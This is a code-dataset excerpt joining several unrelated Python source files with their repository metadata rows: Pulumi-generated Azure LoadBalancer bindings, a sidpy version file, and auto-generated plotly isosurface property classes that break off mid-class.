pulumi.Alias(type_="azure-nextgen:network/v20180701:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20180801:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20181101:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20181201:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20190201:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20190401:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20190601:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20190701:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20190801:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20190901:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20191101:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20191201:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20200301:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20200401:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20200501:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20200601:LoadBalancer")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(LoadBalancer, __self__).__init__(
'azure-nextgen:network/v20181001:LoadBalancer',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'LoadBalancer':
"""
Get an existing LoadBalancer resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return LoadBalancer(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="backendAddressPools")
def backend_address_pools(self) -> pulumi.Output[Optional[Sequence['outputs.BackendAddressPoolResponse']]]:
"""
Collection of backend address pools used by a load balancer
"""
return pulumi.get(self, "backend_address_pools")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[Optional[str]]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="frontendIPConfigurations")
def frontend_ip_configurations(self) -> pulumi.Output[Optional[Sequence['outputs.FrontendIPConfigurationResponse']]]:
"""
Object representing the frontend IPs to be used for the load balancer
"""
return pulumi.get(self, "frontend_ip_configurations")
@property
@pulumi.getter(name="inboundNatPools")
def inbound_nat_pools(self) -> pulumi.Output[Optional[Sequence['outputs.InboundNatPoolResponse']]]:
"""
Defines an external port range for inbound NAT to a single backend port on NICs associated with a load balancer. Inbound NAT rules are created automatically for each NIC associated with the Load Balancer using an external port from this range. Defining an Inbound NAT pool on your Load Balancer is mutually exclusive with defining inbound Nat rules. Inbound NAT pools are referenced from virtual machine scale sets. NICs that are associated with individual virtual machines cannot reference an inbound NAT pool. They have to reference individual inbound NAT rules.
"""
return pulumi.get(self, "inbound_nat_pools")
@property
@pulumi.getter(name="inboundNatRules")
def inbound_nat_rules(self) -> pulumi.Output[Optional[Sequence['outputs.InboundNatRuleResponse']]]:
"""
Collection of inbound NAT Rules used by a load balancer. Defining inbound NAT rules on your load balancer is mutually exclusive with defining an inbound NAT pool. Inbound NAT pools are referenced from virtual machine scale sets. NICs that are associated with individual virtual machines cannot reference an Inbound NAT pool. They have to reference individual inbound NAT rules.
"""
return pulumi.get(self, "inbound_nat_rules")
@property
@pulumi.getter(name="loadBalancingRules")
def load_balancing_rules(self) -> pulumi.Output[Optional[Sequence['outputs.LoadBalancingRuleResponse']]]:
"""
Object collection representing the load balancing rules Gets the provisioning
"""
return pulumi.get(self, "load_balancing_rules")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="outboundRules")
def outbound_rules(self) -> pulumi.Output[Optional[Sequence['outputs.OutboundRuleResponse']]]:
"""
The outbound rules.
"""
return pulumi.get(self, "outbound_rules")
@property
@pulumi.getter
def probes(self) -> pulumi.Output[Optional[Sequence['outputs.ProbeResponse']]]:
"""
Collection of probe objects used in the load balancer
"""
return pulumi.get(self, "probes")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[Optional[str]]:
"""
Gets the provisioning state of the PublicIP resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> pulumi.Output[Optional[str]]:
"""
The resource GUID property of the load balancer resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter
def sku(self) -> pulumi.Output[Optional['outputs.LoadBalancerSkuResponse']]:
"""
The load balancer SKU.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| [
"[email protected]"
] | |
3b7e7606078cd3ed5a6bce29f7891a86294ca375 | fb4473a0c00d89f55fb2d07bad3d62302a715f5b | /sidpy/__version__.py | 2fde28695a3068688f07069ca37f51f4ac4cf919 | [
"MIT"
] | permissive | ziatdinovmax/sidpy | b700535014b78eeddf3aff4b57f5110e220d9a2e | 299147bfc22741b5170aa00e92b34159dfc910c5 | refs/heads/master | 2022-12-19T07:28:39.509116 | 2020-10-03T00:31:20 | 2020-10-03T00:31:20 | 292,929,545 | 0 | 0 | MIT | 2020-09-04T19:23:14 | 2020-09-04T19:23:13 | null | UTF-8 | Python | false | false | 47 | py | version = '0.0.3'
time = '2020-09-18 10:00:25'
| [
"[email protected]"
] | |
a5056688c64509504bfa9c7a6d05f17f4545a6f5 | 41c605bf3a002a757cb2344cff526d7a7ae56ea9 | /plotly/graph_objs/isosurface/__init__.py | 641825ef79e0665708cf71c4b63a4d978f9ad605 | [
"MIT"
] | permissive | Jonathan-MW/plotly.py | 9674b90b5de11fd9089e6afefd04b57bc4587829 | 7528c00772f44dee24c0df7e15d70a4852f171a8 | refs/heads/master | 2020-05-30T06:04:13.621478 | 2019-05-31T10:34:15 | 2019-05-31T10:34:15 | 189,571,988 | 2 | 0 | MIT | 2019-05-31T09:59:53 | 2019-05-31T09:59:53 | null | UTF-8 | Python | false | false | 137,729 | py |
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Surface(_BaseTraceHierarchyType):
# count
# -----
@property
def count(self):
"""
Sets the number of iso-surfaces between minimum and maximum
iso-values. By default this value is 2 meaning that only
minimum and maximum surfaces would be drawn.
The 'count' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [1, 9223372036854775807]
Returns
-------
int
"""
return self['count']
@count.setter
def count(self, val):
self['count'] = val
# fill
# ----
@property
def fill(self):
"""
Sets the fill ratio of the iso-surface. The default fill value
of the surface is 1 meaning that they are entirely shaded. On
the other hand Applying a `fill` ratio less than one would
allow the creation of openings parallel to the edges.
The 'fill' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['fill']
@fill.setter
def fill(self, val):
self['fill'] = val
# pattern
# -------
@property
def pattern(self):
"""
Sets the surface pattern of the iso-surface 3-D sections. The
default pattern of the surface is `all` meaning that the rest
of surface elements would be shaded. The check options (either
1 or 2) could be used to draw half of the squares on the
surface. Using various combinations of capital `A`, `B`, `C`,
`D` and `E` may also be used to reduce the number of triangles
on the iso-surfaces and creating other patterns of interest.
The 'pattern' property is a flaglist and may be specified
as a string containing:
- Any combination of ['A', 'B', 'C', 'D', 'E'] joined with '+' characters
(e.g. 'A+B')
OR exactly one of ['all', 'odd', 'even'] (e.g. 'even')
Returns
-------
Any
"""
return self['pattern']
@pattern.setter
def pattern(self, val):
self['pattern'] = val
# show
# ----
@property
def show(self):
"""
Hides/displays surfaces between minimum and maximum iso-values.
The 'show' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['show']
@show.setter
def show(self, val):
self['show'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return 'isosurface'
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
count
Sets the number of iso-surfaces between minimum and
maximum iso-values. By default this value is 2 meaning
that only minimum and maximum surfaces would be drawn.
fill
Sets the fill ratio of the iso-surface. The default
fill value of the surface is 1 meaning that they are
entirely shaded. On the other hand Applying a `fill`
ratio less than one would allow the creation of
openings parallel to the edges.
pattern
Sets the surface pattern of the iso-surface 3-D
sections. The default pattern of the surface is `all`
meaning that the rest of surface elements would be
shaded. The check options (either 1 or 2) could be used
to draw half of the squares on the surface. Using
various combinations of capital `A`, `B`, `C`, `D` and
`E` may also be used to reduce the number of triangles
on the iso-surfaces and creating other patterns of
interest.
show
Hides/displays surfaces between minimum and maximum
iso-values.
"""
def __init__(
self,
arg=None,
count=None,
fill=None,
pattern=None,
show=None,
**kwargs
):
"""
Construct a new Surface object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.isosurface.Surface
count
Sets the number of iso-surfaces between minimum and
maximum iso-values. By default this value is 2 meaning
that only minimum and maximum surfaces would be drawn.
fill
Sets the fill ratio of the iso-surface. The default
fill value of the surface is 1 meaning that they are
entirely shaded. On the other hand Applying a `fill`
ratio less than one would allow the creation of
openings parallel to the edges.
pattern
Sets the surface pattern of the iso-surface 3-D
sections. The default pattern of the surface is `all`
meaning that the rest of surface elements would be
shaded. The check options (either 1 or 2) could be used
to draw half of the squares on the surface. Using
various combinations of capital `A`, `B`, `C`, `D` and
`E` may also be used to reduce the number of triangles
on the iso-surfaces and creating other patterns of
interest.
show
Hides/displays surfaces between minimum and maximum
iso-values.
Returns
-------
Surface
"""
super(Surface, self).__init__('surface')
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.isosurface.Surface
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Surface"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop('skip_invalid', False)
# Import validators
# -----------------
from plotly.validators.isosurface import (surface as v_surface)
# Initialize validators
# ---------------------
self._validators['count'] = v_surface.CountValidator()
self._validators['fill'] = v_surface.FillValidator()
self._validators['pattern'] = v_surface.PatternValidator()
self._validators['show'] = v_surface.ShowValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop('count', None)
self['count'] = count if count is not None else _v
_v = arg.pop('fill', None)
self['fill'] = fill if fill is not None else _v
_v = arg.pop('pattern', None)
self['pattern'] = pattern if pattern is not None else _v
_v = arg.pop('show', None)
self['show'] = show if show is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Stream(_BaseTraceHierarchyType):
# maxpoints
# ---------
@property
def maxpoints(self):
"""
Sets the maximum number of points to keep on the plots from an
incoming stream. If `maxpoints` is set to 50, only the newest
50 points will be displayed on the plot.
The 'maxpoints' property is a number and may be specified as:
- An int or float in the interval [0, 10000]
Returns
-------
int|float
"""
return self['maxpoints']
@maxpoints.setter
def maxpoints(self, val):
self['maxpoints'] = val
# token
# -----
@property
def token(self):
"""
The stream id number links a data trace on a plot with a
stream. See https://plot.ly/settings for more details.
The 'token' property is a string and must be specified as:
- A non-empty string
Returns
-------
str
"""
return self['token']
@token.setter
def token(self, val):
self['token'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return 'isosurface'
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
maxpoints
Sets the maximum number of points to keep on the plots
from an incoming stream. If `maxpoints` is set to 50,
only the newest 50 points will be displayed on the
plot.
token
The stream id number links a data trace on a plot with
a stream. See https://plot.ly/settings for more
details.
"""
def __init__(self, arg=None, maxpoints=None, token=None, **kwargs):
"""
Construct a new Stream object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.isosurface.Stream
maxpoints
Sets the maximum number of points to keep on the plots
from an incoming stream. If `maxpoints` is set to 50,
only the newest 50 points will be displayed on the
plot.
token
The stream id number links a data trace on a plot with
a stream. See https://plot.ly/settings for more
details.
Returns
-------
Stream
"""
super(Stream, self).__init__('stream')
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.isosurface.Stream
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Stream"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop('skip_invalid', False)
# Import validators
# -----------------
from plotly.validators.isosurface import (stream as v_stream)
# Initialize validators
# ---------------------
self._validators['maxpoints'] = v_stream.MaxpointsValidator()
self._validators['token'] = v_stream.TokenValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop('maxpoints', None)
self['maxpoints'] = maxpoints if maxpoints is not None else _v
_v = arg.pop('token', None)
self['token'] = token if token is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Spaceframe(_BaseTraceHierarchyType):
# fill
# ----
@property
def fill(self):
"""
Sets the fill ratio of the `spaceframe` elements. The default
fill value is 0.15 meaning that only 15% of the area of every
faces of tetras would be shaded. Applying a greater `fill`
ratio would allow the creation of stronger elements or could be
sued to have entirely closed areas (in case of using 1).
The 'fill' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['fill']
@fill.setter
def fill(self, val):
self['fill'] = val
# show
# ----
@property
def show(self):
"""
Displays/hides tetrahedron shapes between minimum and maximum
iso-values. Often useful when either caps or surfaces are
disabled or filled with values less than 1.
The 'show' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['show']
@show.setter
def show(self, val):
self['show'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return 'isosurface'
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
fill
Sets the fill ratio of the `spaceframe` elements. The
default fill value is 0.15 meaning that only 15% of the
area of every faces of tetras would be shaded. Applying
a greater `fill` ratio would allow the creation of
stronger elements or could be sued to have entirely
closed areas (in case of using 1).
show
Displays/hides tetrahedron shapes between minimum and
maximum iso-values. Often useful when either caps or
surfaces are disabled or filled with values less than
1.
"""
def __init__(self, arg=None, fill=None, show=None, **kwargs):
"""
Construct a new Spaceframe object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.isosurface.Spaceframe
fill
Sets the fill ratio of the `spaceframe` elements. The
default fill value is 0.15 meaning that only 15% of the
area of every faces of tetras would be shaded. Applying
a greater `fill` ratio would allow the creation of
stronger elements or could be sued to have entirely
closed areas (in case of using 1).
show
Displays/hides tetrahedron shapes between minimum and
maximum iso-values. Often useful when either caps or
surfaces are disabled or filled with values less than
1.
Returns
-------
Spaceframe
"""
super(Spaceframe, self).__init__('spaceframe')
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.isosurface.Spaceframe
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Spaceframe"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop('skip_invalid', False)
# Import validators
# -----------------
from plotly.validators.isosurface import (spaceframe as v_spaceframe)
# Initialize validators
# ---------------------
self._validators['fill'] = v_spaceframe.FillValidator()
self._validators['show'] = v_spaceframe.ShowValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop('fill', None)
self['fill'] = fill if fill is not None else _v
_v = arg.pop('show', None)
self['show'] = show if show is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Slices(_BaseTraceHierarchyType):
# x
# -
@property
def x(self):
"""
The 'x' property is an instance of X
that may be specified as:
- An instance of plotly.graph_objs.isosurface.slices.X
- A dict of string/value properties that will be passed
to the X constructor
Supported dict properties:
fill
Sets the fill ratio of the `slices`. The
default fill value of the `slices` is 1 meaning
that they are entirely shaded. On the other
hand Applying a `fill` ratio less than one
would allow the creation of openings parallel
to the edges.
locations
Specifies the location(s) of slices on the
axis. When not specified slices would be
created for all points of the axis x except
start and end.
locationssrc
Sets the source reference on plot.ly for
locations .
show
Determines whether or not slice planes about
the x dimension are drawn.
Returns
-------
plotly.graph_objs.isosurface.slices.X
"""
return self['x']
@x.setter
def x(self, val):
self['x'] = val
# y
# -
@property
def y(self):
"""
The 'y' property is an instance of Y
that may be specified as:
- An instance of plotly.graph_objs.isosurface.slices.Y
- A dict of string/value properties that will be passed
to the Y constructor
Supported dict properties:
fill
Sets the fill ratio of the `slices`. The
default fill value of the `slices` is 1 meaning
that they are entirely shaded. On the other
hand Applying a `fill` ratio less than one
would allow the creation of openings parallel
to the edges.
locations
Specifies the location(s) of slices on the
axis. When not specified slices would be
created for all points of the axis y except
start and end.
locationssrc
Sets the source reference on plot.ly for
locations .
show
Determines whether or not slice planes about
the y dimension are drawn.
Returns
-------
plotly.graph_objs.isosurface.slices.Y
"""
return self['y']
@y.setter
def y(self, val):
self['y'] = val
# z
# -
@property
def z(self):
"""
The 'z' property is an instance of Z
that may be specified as:
- An instance of plotly.graph_objs.isosurface.slices.Z
- A dict of string/value properties that will be passed
to the Z constructor
Supported dict properties:
fill
Sets the fill ratio of the `slices`. The
default fill value of the `slices` is 1 meaning
that they are entirely shaded. On the other
hand Applying a `fill` ratio less than one
would allow the creation of openings parallel
to the edges.
locations
Specifies the location(s) of slices on the
axis. When not specified slices would be
created for all points of the axis z except
start and end.
locationssrc
Sets the source reference on plot.ly for
locations .
show
Determines whether or not slice planes about
the z dimension are drawn.
Returns
-------
plotly.graph_objs.isosurface.slices.Z
"""
return self['z']
@z.setter
def z(self, val):
self['z'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return 'isosurface'
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
x
plotly.graph_objs.isosurface.slices.X instance or dict
with compatible properties
y
plotly.graph_objs.isosurface.slices.Y instance or dict
with compatible properties
z
plotly.graph_objs.isosurface.slices.Z instance or dict
with compatible properties
"""
def __init__(self, arg=None, x=None, y=None, z=None, **kwargs):
"""
Construct a new Slices object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.isosurface.Slices
x
plotly.graph_objs.isosurface.slices.X instance or dict
with compatible properties
y
plotly.graph_objs.isosurface.slices.Y instance or dict
with compatible properties
z
plotly.graph_objs.isosurface.slices.Z instance or dict
with compatible properties
Returns
-------
Slices
"""
super(Slices, self).__init__('slices')
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.isosurface.Slices
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Slices"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop('skip_invalid', False)
# Import validators
# -----------------
from plotly.validators.isosurface import (slices as v_slices)
# Initialize validators
# ---------------------
self._validators['x'] = v_slices.XValidator()
self._validators['y'] = v_slices.YValidator()
self._validators['z'] = v_slices.ZValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop('x', None)
self['x'] = x if x is not None else _v
_v = arg.pop('y', None)
self['y'] = y if y is not None else _v
_v = arg.pop('z', None)
self['z'] = z if z is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Lightposition(_BaseTraceHierarchyType):
# x
# -
@property
def x(self):
"""
Numeric vector, representing the X coordinate for each vertex.
The 'x' property is a number and may be specified as:
- An int or float in the interval [-100000, 100000]
Returns
-------
int|float
"""
return self['x']
@x.setter
def x(self, val):
self['x'] = val
# y
# -
@property
def y(self):
"""
Numeric vector, representing the Y coordinate for each vertex.
The 'y' property is a number and may be specified as:
- An int or float in the interval [-100000, 100000]
Returns
-------
int|float
"""
return self['y']
@y.setter
def y(self, val):
self['y'] = val
# z
# -
@property
def z(self):
"""
Numeric vector, representing the Z coordinate for each vertex.
The 'z' property is a number and may be specified as:
- An int or float in the interval [-100000, 100000]
Returns
-------
int|float
"""
return self['z']
@z.setter
def z(self, val):
self['z'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return 'isosurface'
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
x
Numeric vector, representing the X coordinate for each
vertex.
y
Numeric vector, representing the Y coordinate for each
vertex.
z
Numeric vector, representing the Z coordinate for each
vertex.
"""
def __init__(self, arg=None, x=None, y=None, z=None, **kwargs):
"""
Construct a new Lightposition object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
plotly.graph_objs.isosurface.Lightposition
x
Numeric vector, representing the X coordinate for each
vertex.
y
Numeric vector, representing the Y coordinate for each
vertex.
z
Numeric vector, representing the Z coordinate for each
vertex.
Returns
-------
Lightposition
"""
super(Lightposition, self).__init__('lightposition')
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.isosurface.Lightposition
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Lightposition"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop('skip_invalid', False)
# Import validators
# -----------------
from plotly.validators.isosurface import (
lightposition as v_lightposition
)
# Initialize validators
# ---------------------
self._validators['x'] = v_lightposition.XValidator()
self._validators['y'] = v_lightposition.YValidator()
self._validators['z'] = v_lightposition.ZValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop('x', None)
self['x'] = x if x is not None else _v
_v = arg.pop('y', None)
self['y'] = y if y is not None else _v
_v = arg.pop('z', None)
self['z'] = z if z is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Lighting(_BaseTraceHierarchyType):
# ambient
# -------
@property
def ambient(self):
"""
Ambient light increases overall color visibility but can wash
out the image.
The 'ambient' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['ambient']
@ambient.setter
def ambient(self, val):
self['ambient'] = val
# diffuse
# -------
@property
def diffuse(self):
"""
Represents the extent that incident rays are reflected in a
range of angles.
The 'diffuse' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['diffuse']
@diffuse.setter
def diffuse(self, val):
self['diffuse'] = val
# facenormalsepsilon
# ------------------
@property
def facenormalsepsilon(self):
"""
Epsilon for face normals calculation avoids math issues arising
from degenerate geometry.
The 'facenormalsepsilon' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['facenormalsepsilon']
@facenormalsepsilon.setter
def facenormalsepsilon(self, val):
self['facenormalsepsilon'] = val
# fresnel
# -------
@property
def fresnel(self):
"""
Represents the reflectance as a dependency of the viewing
angle; e.g. paper is reflective when viewing it from the edge
of the paper (almost 90 degrees), causing shine.
The 'fresnel' property is a number and may be specified as:
- An int or float in the interval [0, 5]
Returns
-------
int|float
"""
return self['fresnel']
@fresnel.setter
def fresnel(self, val):
self['fresnel'] = val
# roughness
# ---------
@property
def roughness(self):
"""
Alters specular reflection; the rougher the surface, the wider
and less contrasty the shine.
The 'roughness' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['roughness']
@roughness.setter
def roughness(self, val):
self['roughness'] = val
# specular
# --------
@property
def specular(self):
"""
Represents the level that incident rays are reflected in a
single direction, causing shine.
The 'specular' property is a number and may be specified as:
- An int or float in the interval [0, 2]
Returns
-------
int|float
"""
return self['specular']
@specular.setter
def specular(self, val):
self['specular'] = val
# vertexnormalsepsilon
# --------------------
@property
def vertexnormalsepsilon(self):
"""
Epsilon for vertex normals calculation avoids math issues
arising from degenerate geometry.
The 'vertexnormalsepsilon' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['vertexnormalsepsilon']
@vertexnormalsepsilon.setter
def vertexnormalsepsilon(self, val):
self['vertexnormalsepsilon'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return 'isosurface'
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
ambient
Ambient light increases overall color visibility but
can wash out the image.
diffuse
Represents the extent that incident rays are reflected
in a range of angles.
facenormalsepsilon
Epsilon for face normals calculation avoids math issues
arising from degenerate geometry.
fresnel
Represents the reflectance as a dependency of the
viewing angle; e.g. paper is reflective when viewing it
from the edge of the paper (almost 90 degrees), causing
shine.
roughness
Alters specular reflection; the rougher the surface,
the wider and less contrasty the shine.
specular
Represents the level that incident rays are reflected
in a single direction, causing shine.
vertexnormalsepsilon
Epsilon for vertex normals calculation avoids math
issues arising from degenerate geometry.
"""
def __init__(
self,
arg=None,
ambient=None,
diffuse=None,
facenormalsepsilon=None,
fresnel=None,
roughness=None,
specular=None,
vertexnormalsepsilon=None,
**kwargs
):
"""
Construct a new Lighting object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.isosurface.Lighting
ambient
Ambient light increases overall color visibility but
can wash out the image.
diffuse
Represents the extent that incident rays are reflected
in a range of angles.
facenormalsepsilon
Epsilon for face normals calculation avoids math issues
arising from degenerate geometry.
fresnel
Represents the reflectance as a dependency of the
viewing angle; e.g. paper is reflective when viewing it
from the edge of the paper (almost 90 degrees), causing
shine.
roughness
Alters specular reflection; the rougher the surface,
the wider and less contrasty the shine.
specular
Represents the level that incident rays are reflected
in a single direction, causing shine.
vertexnormalsepsilon
Epsilon for vertex normals calculation avoids math
issues arising from degenerate geometry.
Returns
-------
Lighting
"""
super(Lighting, self).__init__('lighting')
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.isosurface.Lighting
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Lighting"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop('skip_invalid', False)
# Import validators
# -----------------
from plotly.validators.isosurface import (lighting as v_lighting)
# Initialize validators
# ---------------------
self._validators['ambient'] = v_lighting.AmbientValidator()
self._validators['diffuse'] = v_lighting.DiffuseValidator()
self._validators['facenormalsepsilon'
] = v_lighting.FacenormalsepsilonValidator()
self._validators['fresnel'] = v_lighting.FresnelValidator()
self._validators['roughness'] = v_lighting.RoughnessValidator()
self._validators['specular'] = v_lighting.SpecularValidator()
self._validators['vertexnormalsepsilon'
] = v_lighting.VertexnormalsepsilonValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop('ambient', None)
self['ambient'] = ambient if ambient is not None else _v
_v = arg.pop('diffuse', None)
self['diffuse'] = diffuse if diffuse is not None else _v
_v = arg.pop('facenormalsepsilon', None)
self['facenormalsepsilon'
] = facenormalsepsilon if facenormalsepsilon is not None else _v
_v = arg.pop('fresnel', None)
self['fresnel'] = fresnel if fresnel is not None else _v
_v = arg.pop('roughness', None)
self['roughness'] = roughness if roughness is not None else _v
_v = arg.pop('specular', None)
self['specular'] = specular if specular is not None else _v
_v = arg.pop('vertexnormalsepsilon', None)
self[
'vertexnormalsepsilon'
] = vertexnormalsepsilon if vertexnormalsepsilon is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Hoverlabel(_BaseTraceHierarchyType):
# align
# -----
@property
def align(self):
"""
Sets the horizontal alignment of the text content within hover
label box. Has an effect only if the hover label text spans
more two or more lines
The 'align' property is an enumeration that may be specified as:
- One of the following enumeration values:
['left', 'right', 'auto']
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
Any|numpy.ndarray
"""
return self['align']
@align.setter
def align(self, val):
self['align'] = val
# alignsrc
# --------
@property
def alignsrc(self):
"""
Sets the source reference on plot.ly for align .
The 'alignsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self['alignsrc']
@alignsrc.setter
def alignsrc(self, val):
self['alignsrc'] = val
# bgcolor
# -------
